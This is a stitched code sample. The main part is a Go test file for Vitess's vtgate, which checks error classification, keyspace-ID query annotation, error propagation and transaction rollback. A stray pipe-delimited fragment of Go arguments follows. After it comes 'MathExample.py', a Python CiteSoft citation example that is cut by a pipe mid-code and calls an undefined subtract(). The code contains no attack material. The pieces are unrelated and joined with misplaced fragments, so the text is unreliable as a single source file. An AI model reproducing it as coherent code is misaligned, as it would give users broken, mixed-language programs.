split.Query.Sql, expectedSQL, testCase)
}
}
}
func TestIsErrorCausedByVTGate(t *testing.T) {
unknownError := fmt.Errorf("unknown error")
serverError := &tabletconn.ServerError{
ServerCode: vtrpcpb.ErrorCode_QUERY_NOT_SERVED,
Err: "vttablet: retry: error message",
}
shardConnUnknownErr := &gateway.ShardError{Err: unknownError}
shardConnServerErr := &gateway.ShardError{Err: serverError}
shardConnCancelledErr := &gateway.ShardError{Err: context.Canceled}
scatterConnErrAllUnknownErrs := &ScatterConnError{
Errs: []error{unknownError, unknownError, unknownError},
}
scatterConnErrMixed := &ScatterConnError{
Errs: []error{unknownError, shardConnServerErr, shardConnCancelledErr},
}
scatterConnErrAllNonVTGateErrs := &ScatterConnError{
Errs: []error{shardConnServerErr, shardConnServerErr, shardConnCancelledErr},
}
inputToWant := map[error]bool{
unknownError: true,
serverError: false,
context.Canceled: false,
// OperationalErrors that are not tabletconn.Cancelled might be from VTGate
tabletconn.ConnClosed: true,
// Errors wrapped in ShardConnError should get unwrapped
shardConnUnknownErr: true,
shardConnServerErr: false,
shardConnCancelledErr: false,
// We consider a ScatterConnErr with all unknown errors to be from VTGate
scatterConnErrAllUnknownErrs: true,
// We consider a ScatterConnErr with a mix of errors to be from VTGate
scatterConnErrMixed: true,
// If every error in ScatterConnErr list is caused by external components, we shouldn't
// consider the error to be from VTGate
scatterConnErrAllNonVTGateErrs: false,
}
for input, want := range inputToWant {
got := isErrorCausedByVTGate(input)
if got != want {
t.Errorf("isErrorCausedByVTGate(%v) => %v, want %v",
input, got, want)
}
}
}
// Functions for testing
// keyspace_id and 'filtered_replication_unfriendly'
// annotations.
func TestAnnotatingExecuteKeyspaceIds(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteKeyspaceIds")
_, err := rpcVTGate.ExecuteKeyspaceIds(
context.Background(),
"INSERT INTO table () VALUES();",
nil,
keyspace,
[][]byte{{0x10}},
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
verifyQueryAnnotatedWithKeyspaceID(t, []byte{0x10}, shards[0])
}
func TestAnnotatingExecuteKeyspaceIdsMultipleIds(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteKeyspaceIdsMultipleIds")
_, err := rpcVTGate.ExecuteKeyspaceIds(
context.Background(),
"INSERT INTO table () VALUES();",
nil,
keyspace,
[][]byte{{0x10}, {0x15}},
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err == nil || !strings.Contains(err.Error(), "DML should not span multiple keyspace_ids") {
t.Fatalf("want specific error, got %v", err)
}
// Currently, there's logic in resolver.go for rejecting
// multiple-ids DML's so we expect 0 queries here.
verifyNumQueries(t, 0, shards[0].Queries)
}
func TestAnnotatingExecuteKeyRanges(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteKeyRanges")
_, err := rpcVTGate.ExecuteKeyRanges(
context.Background(),
"UPDATE table SET col1=1 WHERE col2>3;",
nil,
keyspace,
[]*topodatapb.KeyRange{{Start: []byte{0x10}, End: []byte{0x40}}},
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
// Keyrange spans both shards.
verifyQueryAnnotatedAsUnfriendly(t, shards[0])
verifyQueryAnnotatedAsUnfriendly(t, shards[1])
}
func TestAnnotatingExecuteEntityIds(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteEntityIds")
_, err := rpcVTGate.ExecuteEntityIds(
context.Background(),
"INSERT INTO table () VALUES();",
nil,
keyspace,
"entity_column_name",
[]*vtgatepb.ExecuteEntityIdsRequest_EntityId{
{
Type: sqltypes.Int64,
Value: []byte("0"),
KeyspaceId: []byte{0x10}, // First shard.
},
{
Type: sqltypes.Int64,
Value: []byte("1"),
KeyspaceId: []byte{0x25}, // Second shard.
},
},
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
verifyQueryAnnotatedAsUnfriendly(t, shards[0])
verifyQueryAnnotatedAsUnfriendly(t, shards[1])
}
func TestAnnotatingExecuteShards(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteShards")
_, err := rpcVTGate.ExecuteShards(
context.Background(),
"INSERT INTO table () VALUES();",
nil,
keyspace,
[]string{"20-40"},
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
verifyQueryAnnotatedAsUnfriendly(t, shards[1])
}
func TestAnnotatingExecuteBatchKeyspaceIds(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteBatchKeyspaceIds")
_, err := rpcVTGate.ExecuteBatchKeyspaceIds(
context.Background(),
[]*vtgatepb.BoundKeyspaceIdQuery{
{
Query: &querypb.BoundQuery{
Sql: "INSERT INTO table () VALUES();",
},
Keyspace: keyspace,
KeyspaceIds: [][]byte{{0x10}},
},
{
Query: &querypb.BoundQuery{
Sql: "UPDATE table SET col1=1 WHERE col2>3;",
},
Keyspace: keyspace,
KeyspaceIds: [][]byte{{0x15}},
},
{
Query: &querypb.BoundQuery{
Sql: "DELETE FROM table WHERE col1==4;",
},
Keyspace: keyspace,
KeyspaceIds: [][]byte{{0x25}},
},
},
topodatapb.TabletType_MASTER,
false,
nil,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
verifyBatchQueryAnnotatedWithKeyspaceIds(
t,
[][]byte{{0x10}, {0x15}},
shards[0])
verifyBatchQueryAnnotatedWithKeyspaceIds(
t,
[][]byte{{0x25}},
shards[1])
}
func TestAnnotatingExecuteBatchKeyspaceIdsMultipleIds(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteBatchKeyspaceIdsMultipleIds")
_, err := rpcVTGate.ExecuteBatchKeyspaceIds(
context.Background(),
[]*vtgatepb.BoundKeyspaceIdQuery{
{
Query: &querypb.BoundQuery{
Sql: "INSERT INTO table () VALUES();",
},
Keyspace: keyspace,
KeyspaceIds: [][]byte{
{0x10},
{0x15},
},
},
},
topodatapb.TabletType_MASTER,
false,
nil,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
verifyBatchQueryAnnotatedAsUnfriendly(
t,
1, // expectedNumQueries
shards[0])
}
func TestAnnotatingExecuteBatchShards(t *testing.T) {
keyspace, shards := setUpSandboxWithTwoShards("TestAnnotatingExecuteBatchShards")
_, err := rpcVTGate.ExecuteBatchShards(
context.Background(),
[]*vtgatepb.BoundShardQuery{
{
Query: &querypb.BoundQuery{
Sql: "INSERT INTO table () VALUES();",
},
Keyspace: keyspace,
Shards: []string{"-20", "20-40"},
},
{
Query: &querypb.BoundQuery{
Sql: "UPDATE table SET col1=1 WHERE col2>3;",
},
Keyspace: keyspace,
Shards: []string{"-20"},
},
{
Query: &querypb.BoundQuery{
Sql: "UPDATE table SET col1=1 WHERE col2>3;",
},
Keyspace: keyspace,
Shards: []string{"20-40"},
},
{
Query: &querypb.BoundQuery{
Sql: "DELETE FROM table WHERE col1==4;",
},
Keyspace: keyspace,
Shards: []string{"20-40"},
},
},
topodatapb.TabletType_MASTER,
false,
nil,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
verifyBatchQueryAnnotatedAsUnfriendly(
t,
2, // expectedNumQueries
shards[0])
verifyBatchQueryAnnotatedAsUnfriendly(
t,
3, // expectedNumQueries
shards[1])
}
// TODO(erez): Add testing annotations of vtgate.Execute (V3)
// Sets up a sandbox with two shards:
// the first named "-20" for the -20 keyrange, and
// the second named "20-40" for the 20-40 keyrange.
// It returns the created shards and as a convenience the given
// keyspace.
//
// NOTE: You should not call this method multiple times with
// the same 'keyspace' parameter: "shardGateway" caches connections
// for a keyspace, and may re-send queries to the shards created in
// a previous call to this method.
func setUpSandboxWithTwoShards(keyspace string) (string, []*sandboxconn.SandboxConn) {
shards := []*sandboxconn.SandboxConn{{}, {}}
createSandbox(keyspace)
hcVTGateTest.Reset()
shards[0] = hcVTGateTest.AddTestTablet("aa", "-20", 1, keyspace, "-20", topodatapb.TabletType_MASTER, true, 1, nil)
shards[1] = hcVTGateTest.AddTestTablet("aa", "20-40", 1, keyspace, "20-40", topodatapb.TabletType_MASTER, true, 1, nil)
return keyspace, shards
}
// Verifies that 'shard' was sent exactly one query and that it
// was annotated with 'expectedKeyspaceID'
func verifyQueryAnnotatedWithKeyspaceID(t *testing.T, expectedKeyspaceID []byte, shard *sandboxconn.SandboxConn) {
if !verifyNumQueries(t, 1, shard.Queries) {
return
}
verifyBoundQueryAnnotatedWithKeyspaceID(t, expectedKeyspaceID, &shard.Queries[0])
}
// Verifies that 'shard' was sent exactly one query and that it
// was annotated as unfriendly.
func verifyQueryAnnotatedAsUnfriendly(t *testing.T, shard *sandboxconn.SandboxConn) {
if !verifyNumQueries(t, 1, shard.Queries) {
return
}
verifyBoundQueryAnnotatedAsUnfriendly(t, &shard.Queries[0])
}
// Verifies 'queries' has exactly 'expectedNumQueries' elements.
// Returns true if verification succeeds.
func verifyNumQueries(t *testing.T, expectedNumQueries int, queries []querytypes.BoundQuery) bool {
numElements := len(queries)
if numElements != expectedNumQueries {
t.Errorf("want %v queries, got: %v (queries: %v)", expectedNumQueries, numElements, queries)
return false
}
return true
}
// Verifies 'batchQueries' has exactly 'expectedNumQueries' elements.
// Returns true if verification succeeds.
func verifyNumBatchQueries(t *testing.T, expectedNumQueries int, batchQueries [][]querytypes.BoundQuery) bool {
numElements := len(batchQueries)
if numElements != expectedNumQueries {
t.Errorf("want %v batch queries, got: %v (batch queries: %v)", expectedNumQueries, numElements, batchQueries)
return false
}
return true
}
func verifyBoundQueryAnnotatedWithKeyspaceID(t *testing.T, expectedKeyspaceID []byte, query *querytypes.BoundQuery) {
verifyBoundQueryAnnotatedWithComment(
t,
"/* vtgate:: keyspace_id:"+hex.EncodeToString(expectedKeyspaceID)+" */",
query)
}
func verifyBoundQueryAnnotatedAsUnfriendly(t *testing.T, query *querytypes.BoundQuery) {
verifyBoundQueryAnnotatedWithComment(
t,
"/* vtgate:: filtered_replication_unfriendly */",
query)
}
func verifyBoundQueryAnnotatedWithComment(t *testing.T, expectedComment string, query *querytypes.BoundQuery) {
if !strings.Contains(query.Sql, expectedComment) {
t.Errorf("want query '%v' to be annotated with '%v'", query.Sql, expectedComment)
}
}
// Verifies that 'shard' was sent exactly one batch-query and that its
// (single) queries are annotated with the elements of expectedKeyspaceIDs
// in order.
func verifyBatchQueryAnnotatedWithKeyspaceIds(t *testing.T, expectedKeyspaceIDs [][]byte, shard *sandboxconn.SandboxConn) {
if !verifyNumBatchQueries(t, 1, shard.BatchQueries) {
return
}
verifyBoundQueriesAnnotatedWithKeyspaceIds(t, expectedKeyspaceIDs, shard.BatchQueries[0])
}
// Verifies that 'shard' was sent exactly one batch-query and that its
// (single) queries are annotated as unfriendly.
func verifyBatchQueryAnnotatedAsUnfriendly(t *testing.T, expectedNumQueries int, shard *sandboxconn.SandboxConn) {
if !verifyNumBatchQueries(t, 1, shard.BatchQueries) {
return
}
verifyBoundQueriesAnnotatedAsUnfriendly(t, expectedNumQueries, shard.BatchQueries[0])
}
func verifyBoundQueriesAnnotatedWithKeyspaceIds(t *testing.T, expectedKeyspaceIDs [][]byte, queries []querytypes.BoundQuery) {
if !verifyNumQueries(t, len(expectedKeyspaceIDs), queries) {
return
}
for i := range queries {
verifyBoundQueryAnnotatedWithKeyspaceID(t, expectedKeyspaceIDs[i], &queries[i])
}
}
func verifyBoundQueriesAnnotatedAsUnfriendly(t *testing.T, expectedNumQueries int, queries []querytypes.BoundQuery) {
if !verifyNumQueries(t, expectedNumQueries, queries) {
return
}
for i := range queries {
verifyBoundQueryAnnotatedAsUnfriendly(t, &queries[i])
}
}
func testErrorPropagation(t *testing.T, sbcs []*sandboxconn.SandboxConn, before func(sbc *sandboxconn.SandboxConn), after func(sbc *sandboxconn.SandboxConn), expected vtrpcpb.ErrorCode) {
// Execute
for _, sbc := range sbcs {
before(sbc)
}
_, err := rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err == nil {
t.Errorf("error %v not propagated for Execute", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// ExecuteShards
for _, sbc := range sbcs {
before(sbc)
}
_, err = rpcVTGate.ExecuteShards(context.Background(),
"query",
nil,
KsTestUnsharded,
[]string{"0"},
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err == nil {
t.Errorf("error %v not propagated for ExecuteShards", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// ExecuteKeyspaceIds
for _, sbc := range sbcs {
before(sbc)
}
_, err = rpcVTGate.ExecuteKeyspaceIds(context.Background(),
"query",
nil,
KsTestUnsharded,
[][]byte{{0x10}},
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err == nil {
t.Errorf("error %v not propagated for ExecuteKeyspaceIds", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// ExecuteKeyRanges
for _, sbc := range sbcs {
before(sbc)
}
_, err = rpcVTGate.ExecuteKeyRanges(context.Background(),
"query",
nil,
KsTestUnsharded,
[]*topodatapb.KeyRange{{End: []byte{0x20}}},
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err == nil {
t.Errorf("error %v not propagated for ExecuteKeyRanges", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// ExecuteEntityIds
for _, sbc := range sbcs {
before(sbc)
}
_, err = rpcVTGate.ExecuteEntityIds(context.Background(),
"query",
nil,
KsTestUnsharded,
"kid",
[]*vtgatepb.ExecuteEntityIdsRequest_EntityId{
{
Type: sqltypes.VarBinary,
Value: []byte("id1"),
KeyspaceId: []byte{0x10},
},
},
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err == nil {
t.Errorf("error %v not propagated for ExecuteEntityIds", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// ExecuteBatchShards
for _, sbc := range sbcs {
before(sbc)
}
_, err = rpcVTGate.ExecuteBatchShards(context.Background(),
[]*vtgatepb.BoundShardQuery{{
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: KsTestUnsharded,
Shards: []string{"0", "0"},
}, {
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: KsTestUnsharded,
Shards: []string{"0", "0"},
}},
topodatapb.TabletType_MASTER,
false,
nil,
executeOptions)
if err == nil {
t.Errorf("error %v not propagated for ExecuteBatchShards", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// ExecuteBatchKeyspaceIds
for _, sbc := range sbcs {
before(sbc)
}
kid10 := []byte{0x10}
kid30 := []byte{0x30}
_, err = rpcVTGate.ExecuteBatchKeyspaceIds(context.Background(),
[]*vtgatepb.BoundKeyspaceIdQuery{{
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: KsTestUnsharded,
KeyspaceIds: [][]byte{kid10, kid30},
}, {
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: KsTestUnsharded,
KeyspaceIds: [][]byte{kid10, kid30},
}},
topodatapb.TabletType_MASTER,
false,
nil,
executeOptions)
if err == nil {
t.Errorf("error %v not propagated for ExecuteBatchShards", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// StreamExecute
for _, sbc := range sbcs {
before(sbc)
}
err = rpcVTGate.StreamExecute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
return nil
})
if err == nil {
t.Errorf("error %v not propagated for StreamExecute", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// StreamExecuteShards
for _, sbc := range sbcs {
before(sbc)
}
err = rpcVTGate.StreamExecuteShards(context.Background(),
"query",
nil,
KsTestUnsharded,
[]string{"0"},
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
return nil
})
if err == nil {
t.Errorf("error %v not propagated for StreamExecuteShards", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// StreamExecuteKeyspaceIds
for _, sbc := range sbcs {
before(sbc)
}
err = rpcVTGate.StreamExecuteKeyspaceIds(context.Background(),
"query",
nil,
KsTestUnsharded,
[][]byte{{0x10}},
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
return nil
})
if err == nil {
t.Errorf("error %v not propagated for StreamExecuteKeyspaceIds", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// StreamExecuteKeyRanges
for _, sbc := range sbcs {
before(sbc)
}
err = rpcVTGate.StreamExecuteKeyRanges(context.Background(),
"query",
nil,
KsTestUnsharded,
[]*topodatapb.KeyRange{{End: []byte{0x20}}},
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
return nil
})
if err == nil {
t.Errorf("error %v not propagated for StreamExecuteKeyRanges", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// Begin is skipped, it doesn't end up going to the tablet.
// Commit
for _, sbc := range sbcs {
before(sbc)
}
session := &vtgatepb.Session{
InTransaction: true,
ShardSessions: []*vtgatepb.Session_ShardSession{{
Target: &querypb.Target{
Keyspace: KsTestUnsharded,
Shard: "0",
TabletType: topodatapb.TabletType_MASTER,
},
TransactionId: 1,
}},
}
err = rpcVTGate.Commit(context.Background(), false, session)
if err == nil {
t.Errorf("error %v not propagated for Commit", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
// Rollback is skipped, it doesn't forward errors.
// SplitQuery
for _, sbc := range sbcs {
before(sbc)
}
_, err = rpcVTGate.SplitQuery(context.Background(),
KsTestUnsharded,
"select col1, col2 from table",
nil,
[]string{"sc1", "sc2"},
100,
0,
querypb.SplitQueryRequest_FULL_SCAN)
if err == nil {
t.Errorf("error %v not propagated for SplitQuery", expected)
} else {
ec := vterrors.RecoverVtErrorCode(err)
if ec != expected {
t.Errorf("unexpected error, got %v want %v: %v", ec, expected, err)
}
}
for _, sbc := range sbcs {
after(sbc)
}
}
// TestErrorPropagation tests an error returned by sandboxconn is
// properly propagated through vtgate layers. We need both a master
// tablet and a rdonly tablet because we don't control the routing of
// Commit nor SplitQuery{,V2}.
func TestErrorPropagation(t *testing.T) {
createSandbox(KsTestUnsharded)
hcVTGateTest.Reset()
sbcm := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, KsTestUnsharded, "0", topodatapb.TabletType_MASTER, true, 1, nil)
sbcrdonly := hcVTGateTest.AddTestTablet("aa", "1.1.1.2", 1001, KsTestUnsharded, "0", topodatapb.TabletType_RDONLY, true, 1, nil)
sbcs := []*sandboxconn.SandboxConn{
sbcm,
sbcrdonly,
}
// ErrorCode_CANCELLED
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailCanceled = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailCanceled = 0
}, vtrpcpb.ErrorCode_CANCELLED)
// ErrorCode_UNKNOWN_ERROR
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailUnknownError = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailUnknownError = 0
}, vtrpcpb.ErrorCode_UNKNOWN_ERROR)
// ErrorCode_BAD_INPUT
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailServer = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailServer = 0
}, vtrpcpb.ErrorCode_BAD_INPUT)
// ErrorCode_DEADLINE_EXCEEDED
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailDeadlineExceeded = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailDeadlineExceeded = 0
}, vtrpcpb.ErrorCode_DEADLINE_EXCEEDED)
// ErrorCode_INTEGRITY_ERROR
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailIntegrityError = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailIntegrityError = 0
}, vtrpcpb.ErrorCode_INTEGRITY_ERROR)
// ErrorCode_PERMISSION_DENIED
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailPermissionDenied = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailPermissionDenied = 0
}, vtrpcpb.ErrorCode_PERMISSION_DENIED)
// ErrorCode_RESOURCE_EXHAUSTED
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailTxPool = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailTxPool = 0
}, vtrpcpb.ErrorCode_RESOURCE_EXHAUSTED)
// ErrorCode_QUERY_NOT_SERVED
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailRetry = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailRetry = 0
}, vtrpcpb.ErrorCode_QUERY_NOT_SERVED)
// ErrorCode_NOT_IN_TX
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailNotTx = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailNotTx = 0
}, vtrpcpb.ErrorCode_NOT_IN_TX)
// ErrorCode_INTERNAL_ERROR
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailFatal = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailFatal = 0
}, vtrpcpb.ErrorCode_INTERNAL_ERROR)
// ErrorCode_TRANSIENT_ERROR
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailTransientError = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailTransientError = 0
}, vtrpcpb.ErrorCode_TRANSIENT_ERROR)
// ErrorCode_UNAUTHENTICATED
testErrorPropagation(t, sbcs, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailUnauthenticated = 20
}, func(sbc *sandboxconn.SandboxConn) {
sbc.MustFailUnauthenticated = 0
}, vtrpcpb.ErrorCode_UNAUTHENTICATED)
}
// This test makes sure that if we start a transaction and hit a critical
// error, a rollback is issued.
func TestErrorIssuesRollback(t *testing.T) {
createSandbox(KsTestUnsharded)
hcVTGateTest.Reset()
sbc := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, KsTestUnsharded, "0", topodatapb.TabletType_MASTER, true, 1, nil)
// Start a transaction, send one statement.
// Simulate an error that should trigger a rollback:
// vtrpcpb.ErrorCode_NOT_IN_TX case.
session, err := rpcVTGate.Begin(context.Background(), false)
if err != nil {
t.Fatalf("cannot start a transaction: %v", err)
}
_, err = rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
if sbc.RollbackCount.Get() != 0 {
t.Errorf("want 0, got %d", sbc.RollbackCount.Get())
}
sbc.MustFailNotTx = 20
_, err = rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err == nil {
t.Fatalf("want error but got nil")
}
if sbc.RollbackCount.Get() != 1 {
t.Errorf("want 1, got %d", sbc.RollbackCount.Get())
}
sbc.RollbackCount.Set(0)
sbc.MustFailNotTx = 0
// Start a transaction, send one statement.
// Simulate an error that should trigger a rollback:
// vtrpcpb.ErrorCode_RESOURCE_EXHAUSTED case.
session, err = rpcVTGate.Begin(context.Background(), false)
if err != nil {
t.Fatalf("cannot start a transaction: %v", err)
}
_, err = rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
if sbc.RollbackCount.Get() != 0 {
t.Errorf("want 0, got %d", sbc.RollbackCount.Get())
}
sbc.MustFailTxPool = 20
_, err = rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err == nil {
t.Fatalf("want error but got nil")
}
if sbc.RollbackCount.Get() != 1 {
t.Errorf("want 1, got %d", sbc.RollbackCount.Get())
}
sbc.RollbackCount.Set(0)
sbc.MustFailTxPool = 0
// Start a transaction, send one statement.
// Simulate an error that should *not* trigger a rollback:
// vtrpcpb.ErrorCode_INTEGRITY_ERROR case.
session, err = rpcVTGate.Begin(context.Background(), false)
if err != nil {
t.Fatalf("cannot start a transaction: %v", err)
}
_, err = rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
if sbc.RollbackCount.Get() != 0 {
t.Errorf("want 0, got %d", sbc.RollbackCount.Get())
}
sbc.MustFailIntegrityError = 20
_, err = rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err == nil {
t.Fatalf("want error but got nil")
}
if sbc.RollbackCount.Get() != 0 {
t.Errorf("want 0, got %d", sbc.RollbackCount.Get())
}
sbc.MustFailIntegrityError = 0
} | },
},
topodatapb.TabletType_MASTER, |
MathExample.py | import sys
import math
try:
import CiteSoft
except:
import os #The below lines are to allow CiteSoftLocal to be called regardless of user's working directory.
lenOfFileName = len(os.path.basename(__file__)) #This is the name of **this** file.
absPathWithoutFileName = os.path.abspath(__file__)[0:-1*lenOfFileName]
sys.path.append(absPathWithoutFileName)
import CiteSoftLocal as CiteSoft
#Here CiteSoft is used with an example module called "MathExample"
#Note that the unique_id should be something truly unique (no other software would use it).
#Typically, unique_id is a DOI or a URL.
#The author field is typically a list object with names as strings, but can also just be a single string.
#Note that there is a function called sqrt which uses the python math module, and uses a *different* citation.
software_name = "CiteSoft Math Example"
version = "1.0.0"
MathExample_unique_id = "https://github.com/AdityaSavara/CiteSoft_py/blob/master/MathExample.py"
kwargs = {"version": version, "author": ["Aditya Savara", "CPH"], "url": "https://github.com/AdityaSavara/CiteSoft_py/blob/master/MathExample.py"}
#The below line will cause this module's citation to be exported any time the module is imported.
#The 'write_immediately = True' causes the checkpoint to be written at the time of export rather than stored.
CiteSoft.import_cite(unique_id=MathExample_unique_id, software_name="MathLib Example", write_immediately=True, **kwargs)
@CiteSoft.function_call_cite(unique_id=MathExample_unique_id, software_name="CiteSoft Math Example", **kwargs)
def add(num1, num2):
return num1 + num2
| @CiteSoft.function_call_cite(unique_id=MathExample_unique_id, software_name="CiteSoft Math Example", **kwargs)
def multiply(num1, num2):
return num1 * num2
@CiteSoft.function_call_cite(unique_id=MathExample_unique_id, software_name="CiteSoft Math Example", **kwargs)
def divide(num1, num2):
return num1 / num2
@CiteSoft.after_call_compile_consolidated_log() #This will cause the consolidated log to be complied after the mean function is called. #note that we put it after the function_call_cite so that it is a wrapper around that wrapper and occurs second.
@CiteSoft.function_call_cite(unique_id=MathExample_unique_id, software_name="MathLib Example", **kwargs)
def mean(list_of_num):
result = 0
for num in list_of_num:
result = add(result, num)
result = divide(result, len(list_of_num))
return result
math_unique_id = "https://docs.python.org/3/library/math.html"
math_software_name = "The Python Library Reference: Mathematical functions"
math_version = str(sys.version).split("|")[0] #This is the python version.
math_kwargs = {"version": math_version, "author": "Van Rossum, Guido", "cite": "Van Rossum, G. (2020). The Python Library Reference, release 3.8.2. Python Software Foundation.", "url": "https://docs.python.org/3/library/math.html"}
@CiteSoft.function_call_cite(unique_id=math_unique_id, software_name=math_software_name, **math_kwargs)
def sqrt(num):
return math.sqrt(num)
@CiteSoft.function_call_cite(MathExample_unique_id, software_name, **kwargs)
def sqr(num):
return multiply(num, num)
@CiteSoft.function_call_cite(MathExample_unique_id, software_name, **kwargs)
def sample_variance(list_of_num):
meanVal = mean(list_of_num)
result = 0
for num in list_of_num:
result = add(result, sqr(subtract(num, meanVal)))
result = divide(result, (len(list_of_num) - 1))
return result
